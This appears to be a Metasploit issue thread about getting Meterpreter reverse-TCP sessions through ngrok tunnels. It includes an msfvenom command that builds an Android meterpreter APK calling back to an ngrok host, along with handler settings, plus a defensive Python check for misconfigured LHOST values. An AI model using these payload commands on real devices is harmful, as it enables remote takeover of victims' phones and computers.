What happens is that when the payload is executed it connects to the NGROK tunnel, which opens at port 4444 of localhost. So at last Meterpreter reaches my machine.
The victim machine is a Windows 7 VM with Quick Heal installed.
Now I cannot kill the AV until and unless I gain privileges. But none of the local privilege escalations work.
Because they are meant to run locally, or in some cases remotely, but in my case if I want a post-exploitation module to work:
For example, let's say I am using post/windows/local/ask.
So it wants me to set the current SESSION.
I set it to SESSION 1.
Now if I run it I can't get a session because there is no tunnel between the networks. I don't have a router so I can't port forward that way.
I do my things through my mobile hotspot.
Kali Linux 2017.3
You need to set the LHOST to 0.tcp.ngrok.io, and LPORT to 157xx on both the payload and the handler.
Then use set ReverseListenerBindAddress 127.0.0.1 and set ReverseListenerBindPort 4444 on the handler.
First of all, thank you very much for your time to reply and solve my problem.
I will try your solution as soon as I can go back to my lab. Thank you again.
I appreciate your support.
We have to find a way to make this LHOST issue more publicly visible. It's documented here but that's in the depths of the wiki.
@busterb do you think we should create a "COMMON MISTAKES" wiki page that's really easy to find and shove it in there?
Stop allowing 0.0.0.0 for bind address? Or throw a big fat error if we send a stage out with 0.0.0.0 that tells the user what they did wrong? Maybe the problem isn't documentation but that we allow the user to shoot themselves in the foot with the default settings.
Yeah I think if LHOST is set to anything that maps to localhost or 0.0.0.0 then we should at least throw a warning?
We do currently warn on 127.0.0.1. Maybe expand what to warn on, although when a port is already used we fall back to 0.0.0.0, so we might need to adjust that behavior too.
The fallback on bind is absolutely fine, it's the setting of LHOST (and therefore the config that goes out with metsrv) that's the issue.
+1 to expanding on the warning when LHOST points to the entire Internet :)
0.0.0.0 is only half of the internet :)
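The warning the maintainers are discussing above (flag an LHOST that maps to loopback or 0.0.0.0, while leaving the local bind address alone, since binding to 127.0.0.1 behind a tunnel is a legitimate setup) can be sketched as a small standalone check. This is an added example, not Metasploit code; the function names and the constructed offline resolver are assumptions.

```python
import ipaddress
import socket


def resolve_host(host, resolver=None):
    """Return the IP addresses `host` maps to.

    IP literals are returned unchanged. Hostnames go through `resolver`
    (a callable taking the name and returning a list of IP strings); it
    defaults to socket.getaddrinfo, but an offline stand-in can be passed
    in, which is what the example at the bottom does.
    """
    try:
        ipaddress.ip_address(host)
        return [host]
    except ValueError:
        pass
    if resolver is not None:
        return list(resolver(host))
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return []
    return sorted({info[4][0] for info in infos})


def address_kind(ip_text):
    """Classify an IP as 'unspecified' (0.0.0.0 / ::), 'loopback' or 'other'."""
    ip = ipaddress.ip_address(ip_text)
    if ip.is_unspecified:
        return "unspecified"
    if ip.is_loopback:
        return "loopback"
    return "other"


def check_listener_config(lhost, bind_address=None, resolver=None):
    """Return a list of warnings for a reverse-connect handler configuration.

    `lhost` is what gets compiled into the payload/stage (the address the
    target connects back to); `bind_address` is where the handler actually
    listens (ReverseListenerBindAddress in the thread above). Only the
    former is checked: a loopback or unspecified LHOST means the stage will
    try to connect to the target itself, whereas a bind address that differs
    from LHOST is exactly the tunnel setup described in the thread.
    """
    warnings = []
    ips = resolve_host(lhost, resolver)
    if not ips:
        warnings.append(
            f"LHOST {lhost!r} does not resolve; the stage will have nowhere to connect back to."
        )
        return warnings
    for ip in ips:
        kind = address_kind(ip)
        if kind != "other":
            warnings.append(
                f"LHOST {lhost!r} maps to {ip} ({kind}): the stage would connect back to the "
                "target's own host. Set LHOST to the address the target can reach and, if the "
                "handler must listen elsewhere, set ReverseListenerBindAddress/Port separately."
            )
    return warnings


if __name__ == "__main__":
    # Constructed resolver so the example runs offline: pretend the tunnel
    # hostname resolves to a TEST-NET address (placeholder, not a real ngrok IP).
    fake_dns = lambda name: ["203.0.113.10"] if name == "0.tcp.ngrok.io" else []
    for lhost, bind in [("127.0.0.1", None), ("0.0.0.0", None),
                        ("0.tcp.ngrok.io", "127.0.0.1")]:
        found = check_listener_config(lhost, bind, resolver=fake_dns)
        print(lhost, "->", found or "ok")
```

The check deliberately says nothing about the bind address: the thread's point is that the bind fallback is fine and only the value baked into the stage matters.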
Okay, thanks. Now I will use my local IP, 192.168.43.xxx. Since NGROK opens a tunnel from 0.tcp.ngrok.io with port 157xx to the localhost of the machine where NGROK is running, there was no problem in getting a stable session the first time. The next time is where the problem starts. Thank you all for guiding me.
:cake:
This is what I have been doing:
https://youtu.be/7ICmUdsNTuM
I created the payload using msfvenom and ngrok as follows:
ngrok tcp 4444
msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=1** R>test.apk
For the handler I used:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444
exploit -j
After this I get a meterpreter session, but it only shows the core commands when I type help; all other commands are missing, including the Android commands. I also tried generating the payload using fatrat but I end up getting the same result!
Please help!